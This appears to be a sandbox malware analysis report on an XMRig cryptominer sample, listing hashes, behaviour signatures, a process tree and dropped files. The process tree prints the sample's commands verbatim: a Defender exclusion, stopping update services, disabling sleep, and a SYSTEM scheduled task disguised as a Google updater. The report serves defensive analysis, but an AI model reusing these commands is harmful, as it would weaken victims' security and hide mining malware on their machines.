Overview

overview

10

Static

static

1

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20230703-en
  • resource tags

    arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system
  • submitted
    10/07/2023, 21:37

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    5.6MB

  • MD5

    56270856311af456a2d0216129d8daf5

  • SHA1

    c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

  • SHA256

    f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

  • SHA512

    85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

  • SSDEEP

    98304:PyPCWkFm5sbtLInk76Wbe02hQsvPDVXl5nJWt+1iYD8QR6nPQ6E3CzhSmHoaxsmS:PiCpm5uINjPDVXDnJ9ik82qPQNEhSmHG

Score
10/10
xmrigevasionminer

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 12 IoCs
    miner
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
    evasion
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1272
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2188
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2244
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:2144
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:324
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1692
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:840
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2108
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1004
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1552
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:520
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2564
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2184
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:568
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:2096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:896
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:2692
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:2764
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2688
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:2484
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:2884
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2992
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2532
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2460
          • C:\Windows\System32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2492
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hnwthdb#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:2544
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe
          2⤵
            PID:2964
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2104
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {4DCADF47-0231-42E4-A8CA-9467208F4111} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2064

        Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                5.6MB

                MD5

                56270856311af456a2d0216129d8daf5

                SHA1

                c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                SHA256

                f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                SHA512

                85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                Download Submit

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                5.6MB

                MD5

                56270856311af456a2d0216129d8daf5

                SHA1

                c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                SHA256

                f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                SHA512

                85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                Filesize

                7KB

                MD5

                b52fc59c60624fc0459a6f2d860b64d8

                SHA1

                7c132ef3b7e121de47550ad7dd53e4d88c1ca433

                SHA256

                ea5901f6fc8c0c703c9ca2451d420690fd76e53d2e791079131bf896a5b4c1a8

                SHA512

                a3f0d589e08d547456c935a8da786bcbb3b88a498bb135b9d8ccf457f632141b4072b53b620e956a3321d53ea32fee2a409615bdbfde3f87738f018e0e15fbf2

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PZCKCQC8I9U7RV4FLALV.temp
                Filesize

                7KB

                MD5

                b52fc59c60624fc0459a6f2d860b64d8

                SHA1

                7c132ef3b7e121de47550ad7dd53e4d88c1ca433

                SHA256

                ea5901f6fc8c0c703c9ca2451d420690fd76e53d2e791079131bf896a5b4c1a8

                SHA512

                a3f0d589e08d547456c935a8da786bcbb3b88a498bb135b9d8ccf457f632141b4072b53b620e956a3321d53ea32fee2a409615bdbfde3f87738f018e0e15fbf2

                Download Submit

              • C:\Windows\System32\drivers\etc\hosts
                Filesize

                2KB

                MD5

                3e9af076957c5b2f9c9ce5ec994bea05

                SHA1

                a8c7326f6bceffaeed1c2bb8d7165e56497965fe

                SHA256

                e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

                SHA512

                933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

                Download Submit

              • \Program Files\Google\Chrome\updater.exe
                Filesize

                5.6MB

                MD5

                56270856311af456a2d0216129d8daf5

                SHA1

                c0fff6d6a9fda4b7086422efa1e4b1fa3e3258c6

                SHA256

                f23ffdfa7f009f89ccc1629a17278019bb82a5046315eed79c921171d4b7b830

                SHA512

                85d54f7d60203adad5e229a1c5a8abff92bd1a27fcf823933aa5a8d8b4d4c28d36285a0f09d1874a4fab27330ca9394c0cdc1140c8ebe398dbc47b34555d1f86

                Download Submit

              • memory/2064-92-0x000000013F480000-0x000000013FA21000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/2064-90-0x000000013F480000-0x000000013FA21000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/2064-80-0x000000013F480000-0x000000013FA21000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/2104-101-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-113-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-103-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-107-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-99-0x0000000000390000-0x00000000003B0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2104-109-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-111-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-105-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-100-0x0000000000D60000-0x0000000000D80000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2104-97-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-115-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-95-0x0000000000D60000-0x0000000000D80000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2104-94-0x0000000000390000-0x00000000003B0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2104-117-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-119-0x0000000140000000-0x00000001407EF000-memory.dmp

                Filesize

                7.9MB

                Download

              • memory/2104-93-0x0000000000040000-0x0000000000060000-memory.dmp

                Filesize

                128KB

                Download

              • memory/2184-71-0x00000000026F0000-0x0000000002770000-memory.dmp

                Filesize

                512KB

                Download

              • memory/2184-73-0x00000000026F0000-0x0000000002770000-memory.dmp

                Filesize

                512KB

                Download

              • memory/2184-69-0x000000001B140000-0x000000001B422000-memory.dmp

                Filesize

                2.9MB

                Download

              • memory/2184-74-0x00000000026FB000-0x0000000002732000-memory.dmp

                Filesize

                220KB

                Download

              • memory/2184-72-0x00000000026F0000-0x0000000002770000-memory.dmp

                Filesize

                512KB

                Download

              • memory/2184-70-0x0000000001F50000-0x0000000001F58000-memory.dmp

                Filesize

                32KB

                Download

              • memory/2188-59-0x000000001B0A0000-0x000000001B382000-memory.dmp

                Filesize

                2.9MB

                Download

              • memory/2188-60-0x0000000001D30000-0x0000000001D38000-memory.dmp

                Filesize

                32KB

                Download

              • memory/2188-61-0x0000000002454000-0x0000000002457000-memory.dmp

                Filesize

                12KB

                Download

              • memory/2188-62-0x000000000245B000-0x0000000002492000-memory.dmp

                Filesize

                220KB

                Download

              • memory/2620-81-0x0000000001274000-0x0000000001277000-memory.dmp

                Filesize

                12KB

                Download

              • memory/2620-82-0x000000000127B000-0x00000000012B2000-memory.dmp

                Filesize

                220KB

                Download

              • memory/2648-86-0x00000000013DB000-0x0000000001412000-memory.dmp

                Filesize

                220KB

                Download

              • memory/2648-85-0x00000000013D4000-0x00000000013D7000-memory.dmp

                Filesize

                12KB

                Download

              • memory/2964-104-0x0000000140000000-0x000000014002A000-memory.dmp

                Filesize

                168KB

                Download

              • memory/2964-96-0x0000000140000000-0x000000014002A000-memory.dmp

                Filesize

                168KB

                Download

              • memory/3056-54-0x000000013FC10000-0x00000001401B1000-memory.dmp

                Filesize

                5.6MB

                Download

              • memory/3056-76-0x000000013FC10000-0x00000001401B1000-memory.dmp

                Filesize

                5.6MB

                Download